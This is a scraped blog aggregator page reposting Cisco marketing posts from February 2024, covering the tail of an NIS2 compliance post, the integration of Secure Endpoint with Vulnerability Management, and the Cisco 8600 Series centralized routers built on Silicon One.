Detect and report incidents. NIS2 also requires having the tools in place to quickly detect incidents and be able to take action. The regulation defines a strict reporting timeline, and organizations are expected to run comprehensive investigations to help the entire community better understand and protect against new threats. Cisco XDR aggregates intelligence from all security tools deployed in the environment to provide a 360° view in a unified dashboard. It streamlines detection and investigation across both IT and OT domains, making threat hunting and remediation more effective.

Learn more about NIS2 for industries in our free webinar

To learn more about what industrial organizations should implement to comply with NIS2 and secure operations, have a look at our NIS2 for Industries solution overview. Our OT security experts will discuss it in more details during a webinar on March 5th. Save your seat and register now!

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

InstagramFacebookTwitterLinkedIn

Share

"}]]  The European Union is mandating industrial organizations to implement stronger cybersecurity measures. Learn which ones, and why it is important to act now.  Read More Cisco Blogs 

By |2024-02-16T18:50:25+00:00February 16, 2024|Cisco: Learning|0 Comments

Enhanced Cybersecurity with Cisco Secure Endpoint and Vulnerability Management Katie Webster on February 15, 2024 at 1:00 pm

Organizations these days face the daunting challenge of effectively prioritizing and responding to security risks and incidents. The combination of Cisco Secure Endpoint and Cisco Vulnerability… Read more on Cisco Blogs

​[[{"value":"

Organizations these days face the daunting challenge of effectively prioritizing and responding to security risks and incidents. The combination of Cisco Secure Endpoint and Cisco Vulnerability Management form a powerful automated solution, enabling you to detect, prioritize and manage endpoint vulnerabilities, beginning with the most severe ones. There are two integrations available to help address critical aspects of security, both pre- and post-incident, which not only enhance incident response, but also fortify preventative measures.

Post-Incident: Accelerated Response with Risk-Based Context

The first integration focuses on managing security incidents post-occurrence with risk-based context. At the heart of this integration is the Cisco Security Risk Score, powered by Cisco Vulnerability Management. It leverages the organization’s endpoint data and telemetry, enriched with vulnerability threat intelligence, and is analyzed through advanced data science algorithms like machine learning and predictive modeling. The outcome? A quantifiable, granular risk score for every vulnerability, aiding in prioritizing and addressing the most critical issues directly from the Secure Endpoint Console. The Cisco Security Risk Score is prominently displayed in the Secure Endpoint UI, providing scanner-less visibility into vulnerabilities in key operating systems.

Users of Cisco Secure Endpoint Advantage or Premier will automatically gain access to the Cisco Security Risk Score for each CVE on managed endpoints; allowing them to leverage real-world threat intelligence as part of their incident investigation. By integrating the Cisco Security Risk Score into the Secure Endpoint Console, SOC analysts will easily be able to identify the riskiest endpoints in their environment and drill down to understand the vulnerabilities that are driving that risk. Once the riskiest endpoints are identified, you’ll be able to accelerate your incident response by prioritizing action on the most critical vulnerabilities.

Figure 1: Viewing the Risk Score within the Secure Endpoint UIFigure 2: Viewing endpoint vulnerabilities in the Secure Endpoint UI

Pre-Incident: A Holistic Risk-Based Approach

Moving to a more proactive stance, our new integration between Cisco Secure Endpoint and Cisco Vulnerability Management extends beyond a Security Operations use case to allow IT Operations and vulnerability management analysts to gain access to a risk-based vulnerability management platform. This integration allows users of both solutions to detect endpoint vulnerabilities and prioritize those posing the most risk for efficient remediation. With Cisco Secure Endpoint, users can hunt for hidden threats, detect stealthy malware, and perform advanced investigations with global threat intelligence from Cisco Talos. Cisco Vulnerability Management can then ingest the Cisco Secure Endpoint data, leveraging a dedicated data connector, and prioritize the vulnerabilities based on real-world attacker activity and business context. This allows organizations to significantly reduce their risk exposure without increasing their resource investment in remediation capacity.

Figure 3: The Cisco Secure Endpoint connector option shown in the Add Connector UI for Cisco Vulnerability Management

The integration of these two solutions allows users to fully embrace a risk-based approach to endpoint vulnerability management. This integration unlocks several key use cases such as:

Detecting and understanding vulnerabilities on endpoints,
Centralizing vulnerability data from Cisco Secure Endpoint and other security data sources through 50+ available data connectors,
Prioritizing vulnerabilities based on exploitation risk and asset context,
Implementing remediation workflows and enabling IT to self-serve to efficiently reduce risk,
Measuring and reporting on risk posture, industry benchmarks, and progress made.
Remediation Analytics & Scoring, Zero-Day intelligence powered by Cisco Talos, and Vulnerability Intelligence API and UI with the Cisco Vulnerability Management Premier tier

The integration of these two solutions takes vulnerability management to a new level, providing a comprehensive, risk-based approach to cybersecurity.

Figure 4: The Cisco Vulnerability Management UI displaying vulnerabilities

See It in Action

The integration of Cisco Secure Endpoint and Cisco Vulnerability Management is more than just a solution on paper – it’s a practical, real-world tool that can enhance your cybersecurity measures. Don’t just take our word for it, see it for yourself. We’ve created a recorded demo showcasing the combined power of these two products.

To learn more about how Cisco Vulnerability Management can enhance your organization’s cybersecurity efforts, visit https://www.cisco.com/site/us/en/products/security/vulnerability-management/index.html

We’d love to hear what you think. Ask a Question, Comment Below, and Stay Connected with Cisco Security on social!

Cisco Security Social Channels

InstagramFacebookTwitterLinkedIn

Share

"}]]  Discover the power of integrating Cisco Secure Endpoint and Vulnerability Management to bolster your cybersecurity strategy.  Read More Cisco Blogs 

By |2024-02-16T06:49:43+00:00February 16, 2024|Cisco: Learning|0 Comments

Award-Winning Centralized Platform Helps Unlock Value Through Simplicity Swayam Sarangi on February 15, 2024 at 3:59 pm

From work style to vehicle choice, hybrid has become the new norm. In fact, we are surrounded by use cases that need a hybrid approach to problem solving. And as we all know, networks are evolving.… Read more on Cisco Blogs

​[[{"value":"

From work style to vehicle choice, hybrid has become the new norm. In fact, we are surrounded by use cases that need a hybrid approach to problem solving. And as we all know, networks are evolving. Today, networks need to be ready for new and growing applications such as artificial intelligence (AI), augmented and virtual reality (AR/VR), edge clouds, online gaming, connected cars, and video streaming. As a result, communication service providers (CSPs) are considering more options in redesigning networks (see our related blog, Inflection Points of a Converged Metro).

For example, network operators need to cater to their customers by delivering services from anywhere between 1G to 100G speeds, while having the ability to aggregate into 400G networks. Operators need a platform that allows them to bridge this gap from 1G to 400G.

Platform design choices

Typically, there have been two types of form factors for routing platforms: fixed and distributed systems.

Fixed systems can contain a single forwarding chip and single route processor (RP) with fixed interfaces (see Figure 1). Fixed systems typically come in a “pizza box” form factor that is often used in network architectures that are more predictable and simpler, where using a system with fixed interfaces is suitable for anticipated network traffic patterns.

Figure 1. Fixed system

Distributed systems use a different architecture (see Figure 2), where the packet-forwarding decisions and actions take place on the network processor units (NPUs)/forwarding engines located on the individual line cards. Each card maintains a copy of the forwarding information base (FIB) that is distributed by the RP in the control plane. Large distributed systems have traditionally been designed to provide higher total system bandwidth and port densities, field-replaceable line cards, interface diversity, and redundancy.

These requirements have far exceeded what could be accomplished with a single NPU on a fixed system, which is why every line card has multiple NPUs participating in the forwarding decisions. This architecture helps deliver favorable customer outcomes with increased reliability and flexibility.

Figure 2. Distributed system

New hybrid choice with centralized architecture

With the evolution of the network and emergence of more localized and metro-driven traffic patterns, there is a need for network operators to deploy a solution that meets the needs of both fixed and distributed systems. Cisco 8000 Series Routers address this customer problem and market need by delivering a platform that is uniquely positioned to support the reliability and flexibility offered by distributed solutions, while also delivering value with the customer investments.

Instead of having to choose between a fixed or distributed system, customers can now also consider the new centralized system with Cisco 8600 Series Routers (see Figure 3), which blend the resource efficiency of fixed systems with the interface flexibility, upgradeability, and redundancy of distributed systems.

Figure 3. Centralized system

Similar to distributed systems, centralized systems have in-service, replaceable, redundant RPs with CPU and redundant switch cards (SCs) with NPUs to support both data plane and control plane redundancy. Cisco 8600 Series Routers have modular port adapters (MPAs) that can be replaced while in service and enable interface flexibility. Like fixed systems, the forwarding decisions on centralized platforms are handled centrally on the RP/SC instead of the line card.

With the unique centralized design of Cisco 8600 Series Routers, the life of a data packet is carefully managed such that when traffic ingresses on one of the MPA interfaces, the physical layer (PHY) on the ingress MPA sends the traffic to both SCs. The Silicon One ASIC on both SCs processes the packets, so in the event of a failure with the active SC, the other standby SC always has all the packets to support data plane redundancy. At a point in time, only the packets processed by the active SC are forwarded to the network, and packets processed by the standby SC are dropped.

Use cases

With currently over five billion global internet users, it is becoming increasingly impractical for capabilities such as peering to happen at only traditional, centralized internet exchanges. Distributed peering points are emerging across the network to help avoid unnecessarily backhauling traffic to centralized locations. However, metro locations such as colocation sites, data centers, and central offices can be space-constrained, and every additional rack unit (RU) of space is extremely costly.

Deploying right-sized platforms like Cisco 8600 Series Routers can address some of the operator resource challenges while achieving lower upfront costs, data plane and control plane redundancy, port diversity, and architectural simplicity using single-chip forwarding with less components to help lower TCO.

Additional use cases for the Cisco 8608 router include as a core label switch router (LSR), routed data center top-of-rack (ToR)/leaf, and aggregation for cloud and CSP networks. Cisco 8600 Series Routers are also part of the Cisco routed optical networking solution, with support for 400G DCO optics to improve network operational efficiency and simplicity.

Cisco innovations

Figure 4. Cisco Silicon One portfolio and network roles

Cisco Silicon One offers unmatched flexibility with a common silicon architecture, including software development kit (SDK) and P4 programmable forwarding code across multiple network roles (see Figure 4), while supporting fixed, distributed, and centralized systems (see Figure 5). With Cisco Silicon One used in Cisco 8600 Series Routers, we maintain the architectural simplicity and uniformity across the three architecture types. Having a unified architecture helps network operators simplify operations through consistency with upgrades, feature parity, training, testing/qualification, deployment, and troubleshooting.

Figure 5. Form factor types using Cisco Silicon One

Silicon One architecture achieves high performance and full routing capabilities without external memories. The clean-sheet internal architecture includes on-chip high-bandwidth memory (HBM) and supports multiple modes of operation by enabling a router to operate with a single forwarding chip, a line card network processor, and a switch fabric element. This flexibility enables consistent software experience in multiple roles and rapid silicon evolution.

Benefits of simplicity and uniformity across the three architecture types for network operators include:

Consistent software experience across multiple network nodes.
Simplified network operations through consistency with upgrades, qualification, deployment, and troubleshooting.
Unified security and trust across the network.
Programmable interfaces via consistent APIs.

In addition to the capabilities of the Silicon One chipset, Cisco 8600 Series Routers include significant innovations, such as the Cisco IOS XR network operating system (NOS) and the chassis design itself. For example, Cisco 8600 Series Routers enable all major components to be in-service field-replaceable, which helps reduce operational costs.

The single-forwarding chip design on Cisco 8600 Series Routers is well suited for smaller locations by offering simplicity through more bandwidth with fewer components, which helps streamline costs, power, and space (including with chassis depth of less than 600 mm) while also reducing latency.

The first platform in the Cisco 8600 Series Routers product line is the Cisco 8608 router, which includes these components:

Chassis: The router has an eight-slot 7RU chassis at 580 mm depth, which hosts fans, power supplies, RPs, SCs, and MPAs.
Route processor: The RP hosts the CPU complex and the I/O ports. RPs fit vertically in the chassis from the front panel. Up to two RPs are supported in the system and the RPs operate in active-standby mode for a redundant system.
Switch card: SCs sit orthogonally in the back of the MPAs with connections to all MPAs. SCs directly host the NPUs, with up to two SCs in the system that work in active-standby mode to deliver data plane redundancy.
Power supplies: The router has four power supplies that can provide redundant power to the system. The power options include pluggable 3.2 KW AC and pluggable 3.2 KW DC.
Fans: There are eight fans in the system, with each fan individually removable or replaceable to provide N+1 fan redundancy to the system.
Modular port adapters: With a high degree of flexibility, the Cisco 8608 router supports a diverse range of interfaces, including 4×400 GbE, 24×10/25/50 GbE, and a combination of 16×100 GbE or 12×100 GbE+1×400 GbE or 8×100 GbE+2×400 GbE.
Network operating system: Cisco IOS XR is the common NOS across access, aggregation, edge, and core platforms, including Cisco 8600 Series Routers. IOS XR provides network intelligence, programmability, and trustworthy solutions to help deliver operational efficiency.
Manageability: Cisco Crosswork Network Automation is a comprehensive software platform that helps plan, provision, manage, optimize, and assure multi-vendor/multi-domain networks, including Cisco 8600 Series Routers, to help reduce operational costs.

Customer benefits

The centralized architecture of Cisco 8600 Series Routers enables customers to take advantage of three main benefits (see Figure 6), including:

Reliability: The unique hardware architecture provides industry-leading reliability with both control plane and data plane redundancy without loss of any front face plate.
Flexibility: In-service upgradability and mix-and-match port support from 1G to 400G to help to efficiently meet both user and network traffic demands.
Value: Customers can experience greater value with:
Investment protection
MPA backward compatibility
Next-generation SC compatibility

Optimized CapEx spending with right-sized platform to meet specific scale, space, power, and redundancy requirements
Optimized OpEx spending with field-upgradeable and reusable components (similar to distributed systems) combined with using automated operations
Sustainability that can help customers toward meeting their sustainability goals using a simplified centralized architecture.

Figure 6. Enabling customer outcomes

Meet evolving network priorities

Cisco is empowering customers with a hybrid architecture to meet their ever-changing network demands. Cisco 8600 Series Routers are a culmination of innovations in silicon, software, and hardware—all coming together to deliver a new breed of simple, reliable, flexible routers that give customers more choices and help maximize value.

The Cisco 8608 router, available and shipping today, won the “Best of Show Award” Grand Prix at Interop Tokyo 2023 in the network infrastructure category for many of the reasons explained above. This industry recognition is a testament to Cisco innovation.

Learn more about

Cisco 8600 Series Routers

The Cisco 8608 Router is available and shipping today. Find out more with these additional resources:

At-a-glance
Datasheet
Video—Brief overview
Video—Detailed overview
3D view
White paper
Cisco Knowledge Network (CKN) session
Cisco Champions Radio podcast
Cisco Crosswork Network Automation

Share

"}]]  The award-winning Cisco 8600 Series Routers centralized platform gives customers more choices and flexibility that help simplify networks, reduce costs, and increase reliability.  Read More Cisco Blogs 

By |2024-02-15T17:52:19+00:00February 15, 2024|Cisco: Learning|0 Comments
Go to Top